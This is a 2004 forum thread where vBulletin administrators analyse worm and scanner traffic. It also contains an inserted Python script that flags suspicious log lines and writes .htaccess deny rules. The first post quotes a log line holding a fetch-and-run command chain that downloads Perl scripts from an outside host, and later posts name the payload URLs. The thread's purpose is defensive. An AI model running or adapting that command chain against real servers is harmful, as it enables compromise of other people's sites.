showthread attack attempt?
  • #1

    I've been getting many of these logs today:
    Code:
    xx.xx.xx.xx - - [24/Dec/2004:14:20:27 -0600] "GET /showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 20299 "-" "LWP::Simple/5.803"
    Anyone else seen this?

    Is this someone trying to mess with my forums, or using my forums to mess with another forum?
    vB Drupal Community Plumbing | vB Survey | vBusy | vB Spell | vBouncer

  • #2
    If you are not running vBulletin 3.0.3, I suggest you upgrade.
    I don't know which version that worm exploit is for.
    If you allow HTML for users in private msgs, posts, signatures, etc .. turn it off.
    Change your admin & staff account passwords. Add .htaccess directory password protection to your admincp/ and modcp/ directories.



    • #3
      Originally posted by Floris
      If you are not running vBulletin 3.0.3, I suggest you upgrade.
      I don't know which version that worm exploit is for.
      If you allow HTML for users in private msgs, posts, signatures, etc .. turn it off.
      Change your admin & staff account passwords. Add .htaccess directory password protection to your admincp/ and modcp/ directories.
      We're fine version-wise.

      However, this seems to be an aggressive worm, as I'm getting many such hits from various IPs.

      Just checking if others noticed this in their logs. The worm seems to traverse different PHP files, even non-vB ones, so it must be a bot of some sort.
      vB Drupal Community Plumbing | vB Survey | vBusy | vB Spell | vBouncer



      • #4
        It could be that phpBB worm, thinking your forum is phpBB.



        • #5
          It's actually just someone scanning for an exploit: they pass a big long chain of commands to every parameter and then monitor the URL to see if anything actually loads it; if so, then they've found a vulnerable system.

          I'd ban the IP that it's originating from and possibly notify the server owner, as it may be a compromised system that's doing it.
          Scott MacVicar

          My Blog | Twitter



          • #6
            There are 250+ worms trying vbulletin.com right now.



            • #7
              You should share that IP address so others can ban it as well.
              Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
              Change CKEditor Colors to Match Style (for 4.1.4 and above)

              Steve Machol Photography


              Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.




              • #8
                My own server was attacked. However, someone on my server is running phpBB, and although it is the latest version, we still were attacked somehow :/



                • #9
                  I have also found several attacks on our server. It is our own server, and no phpBB is running. One IP address is from ibm.com, and I found another one. There may be more. If I open the IP in my browser I get "spykids ownz your server".

                  They are using: lwp-trivial/1.36 and LWP::Simple/5.69

                  They are also trying the forum archive.
                  Streicher



                  • #10
                    Those are compromised servers trying to attack and infect more servers (which is why they are called worms).



                    • #11
                      The attacks started at 22:00 GMT+1. Since then our logs have had entries for every second. I am trying to block the user agent with .htaccess.
                      Streicher



                      • #12
                        For those who want them, here are the IPs so far in my logs:

                        66.195.243.169
                        65.218.1.33
                        66.98.130.11
                        62.173.67.69
                        67.19.176.50
                        66.194.153.19
                        70.84.28.36
                        66.98.246.86
                        202.177.16.60
                        70.84.3.4
                        202.177.16.60
                        70.84.3.4
                        202.167.234.151
                        209.51.138.226
                        66.227.8.82
                        207.44.238.19
                        217.160.177.230
                        69.93.20.146
                        207.44.238.19
                        65.98.56.138
                        206.123.74.180
                        66.78.4.130
                        69.44.153.30
                        67.18.93.194
                        vB Drupal Community Plumbing | vB Survey | vBusy | vB Spell | vBouncer
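                        As an added illustration that is not part of the thread, the following Python script does what #5, #11 and #12 describe by hand: it parses Apache combined-format access log lines, flags requests whose parameters carry a remote URL or a shell command chain (the cd /tmp;wget ...;perl ... pattern from the first post) or whose User-Agent is one of the LWP clients named in #9, deduplicates the source IPs (the list in #12 repeats three of them), and renders .htaccess directives that deny those IPs and user agents. The log lines are constructed from the one quoted above and use documentation address ranges, not the real scanner IPs; the indicator names and the bad_bot environment variable are my own choices.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log (Apache "combined" format), modelled on the line quoted
# in the first post. IPs are from documentation ranges, not the real scanners.
SAMPLE_LOG = r"""
203.0.113.10 - - [24/Dec/2004:14:20:27 -0600] "GET /showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;perl%20spybot.txt HTTP/1.1" 200 20299 "-" "LWP::Simple/5.803"
203.0.113.10 - - [24/Dec/2004:14:20:28 -0600] "GET /forumdisplay.php?f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/worm1.txt;perl%20worm1.txt HTTP/1.1" 200 18111 "-" "LWP::Simple/5.803"
198.51.100.7 - - [24/Dec/2004:14:21:02 -0600] "GET /archive/index.php?t=http://www.visualcoders.net/spy.gif? HTTP/1.1" 404 1021 "-" "lwp-trivial/1.36"
192.0.2.44 - - [24/Dec/2004:14:22:15 -0600] "GET /showthread.php?t=12345 HTTP/1.1" 200 30456 "http://example.com/" "Mozilla/4.0 (compatible; MSIE 6.0)"
"""

# One combined-format line: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that is itself a URL: the remote-file-inclusion probe.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# A shell command chain of the kind seen in the thread (cd /tmp;wget ...;perl ...).
CMD_CHAIN_RE = re.compile(r'(?:^|[;&|\s])(?:wget|curl|perl|chmod|uname)\b')
# User-Agent prefixes that #9 reports the scanner using (plus the generic libwww one).
SCANNER_UA_PREFIXES = ("LWP::Simple", "lwp-trivial", "libwww-perl")


def classify(line):
    """Return a finding dict for one log line, or None if it is benign or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m['url'])
    # Everything after the first '?' is the query; the embedded URL's own '?' is kept
    # inside the t= value, so it still matches REMOTE_URL_RE.
    params = parse_qs(parts.query, keep_blank_values=True)
    values = [v for vs in params.values() for v in vs]
    indicators = []
    if any(REMOTE_URL_RE.match(v) for v in values):
        indicators.append('remote-url-in-parameter')
    if any(CMD_CHAIN_RE.search(v) for v in values):
        indicators.append('command-chain-in-parameter')
    if m['ua'].startswith(SCANNER_UA_PREFIXES):
        indicators.append('scanner-user-agent')
    if not indicators:
        return None
    return {
        'ip': m['ip'],
        'path': parts.path,
        'status': int(m['status']),
        'ua': m['ua'],
        'indicators': indicators,
    }


def scan_log(text):
    """Scan a whole access log (as one string) and return the findings in log order."""
    return [f for f in (classify(line) for line in text.splitlines()) if f]


def suspicious_ips(findings):
    """Deduplicated, sorted source IPs from the findings."""
    return sorted({f['ip'] for f in findings})


def htaccess_rules(ips, ua_prefixes=SCANNER_UA_PREFIXES):
    """Render Apache 1.3/2.0-style .htaccess directives denying the IPs and user agents."""
    lines = ['Order Allow,Deny', 'Allow from all']
    lines += [f'Deny from {ip}' for ip in ips]
    for prefix in ua_prefixes:
        # SetEnvIfNoCase takes a regex; escape the prefix and anchor it at the start.
        lines.append(f'SetEnvIfNoCase User-Agent "^{re.escape(prefix)}" bad_bot')
    lines.append('Deny from env=bad_bot')
    return '\n'.join(lines) + '\n'


if __name__ == '__main__':
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']:15} {f['status']} {f['path']:22} {', '.join(f['indicators'])}")
    print()
    print(htaccess_rules(suspicious_ips(found)))
```

                        Two caveats when reading the output. A 200 status on showthread.php, as in the first post's line, only means vBulletin rendered a page for a nonsense t= value; it says nothing about whether the injected command ran. As #5 points out, the scanner's real signal is whether your server fetches spy.gif, so the check that matters is your outbound traffic or proxy log for that host, not the inbound status code. And the IP list above will go stale quickly, since every entry is another compromised server; the user-agent rule is the part that keeps working after the IPs change.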



                        • #13
                          It appears to be some people trying to build a botnet; all of those IPs are from compromised servers.

                          http://www.infernonix.com/bot.GIF

                          I joined IRC and had a look about.
                          Scott MacVicar

                          My Blog | Twitter



                          • #14
                            Had a look at the worm; it's generic.

                            $procura = 'inurl:*.php?*=' . $numr;

                            so it's not going to affect us, though you might see a lot of extra traffic going about; nothing we can really do about that.
                            Scott MacVicar

                            My Blog | Twitter



                            • #15
                              Worm located at http://www.visualcoders.net/spy.gif.
                              The coding leaves much to be desired. I saw three errors in the Perl code, so even if they were successful in writing the files to your server, the Perl script would error out.
                              You know, the thing that bothers me is that someone will code a worm that will work and exploit one of the holes in PHP. There are many unpatched boxes, and a worm that exploits them could shut down many sites.
                              Admins Zone - Resources for Forum Administrators
